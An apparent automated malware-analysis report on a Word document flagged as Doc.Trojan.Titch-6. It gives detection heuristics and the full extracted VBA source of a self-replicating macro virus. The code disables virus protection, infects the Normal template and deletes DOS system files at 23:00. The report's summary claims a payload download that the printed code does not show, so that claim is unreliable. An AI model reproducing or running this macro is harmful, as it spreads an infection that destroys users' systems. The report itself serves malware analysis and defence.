MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains multiple high and critical severity heuristics indicating the presence of VBA macros designed to execute code. Specifically, the AutoOpen and Auto_Close macros, along with a Shell() call, suggest an attempt to run arbitrary commands. The script also attempts to copy itself to the NormalTemplate and execute a subroutine named 'doit', which is likely responsible for downloading and executing a secondary payload.
Heuristics 7
-
ClamAV: Doc.Trojan.Titch-6 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Titch-6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2500 bytes |
SHA-256: e3c3e91189c73c8df8d045d3bcb902c49579c644b84dcaffe384df5b13bdf853 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Colgate"
'Colgate.... badnews for a bad world
'Using your computer L8@nite is bad for you
Sub makeit()
On Error Resume Next
Application.Options.VirusProtection = False
Application.Options.SaveNormalPrompt = False
Application.Options.ConfirmConversions = False
Application.CommandBars("Tools").Controls("Macro").Enabled = False
Dim mod_count As Integer
Dim gotit As Boolean
gotit = False
mod_count = 1
For mod_count = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents.Item(mod_count).CodeModule.Lines(2, 1) = "'colgate" Then gotit = True
Next mod_count
If Not gotit Then
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "colgate", wdOrganizerObjectProjectItems
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
gotit = False
mod_count = 1
For mod_count = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents.Item(mod_count).CodeModule.Lines(1, 1) = "'Colgate.... badnews for a bad world" Then gotit = True
Next mod_count
If Not gotit Then
NormalTemplate.VBProject.VBComponents("colgate").Export ("c:\colgate.tmp")
ActiveDocument.VBProject.VBComponents.Import ("c:\colgate.tmp")
ActiveDocument.SaveAs ActiveDocument.FullName
Kill ("c:\colgate.tmp")
End If
If DatePart("h", Time) = 23 Then
doit
End If
End Sub
Sub doit()
On Error Resume Next
Dim dosit As Boolean
Application.CommandBars("File").Enabled = False
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("View").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
Application.CommandBars("Tools").Enabled = False
Application.CommandBars("Table").Enabled = False
Application.CommandBars("Window").Enabled = False
Application.CommandBars("Help").Enabled = False
dosit = Shell("C:\windows\command\attrib.exe -r -h -s C:\*.*")
Kill ("C:\autoexec.bat")
Kill ("C:\IO.SYS")
Kill ("C:\MSDOS.SYS")
Kill ("C:\Command.com")
End Sub
Sub AutoClose()
On Error Resume Next
makeit
End Sub
Sub AutoSave()
On Error Resume Next
makeit
End Sub
Sub AutoOpen()
On Error Resume Next
makeit
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.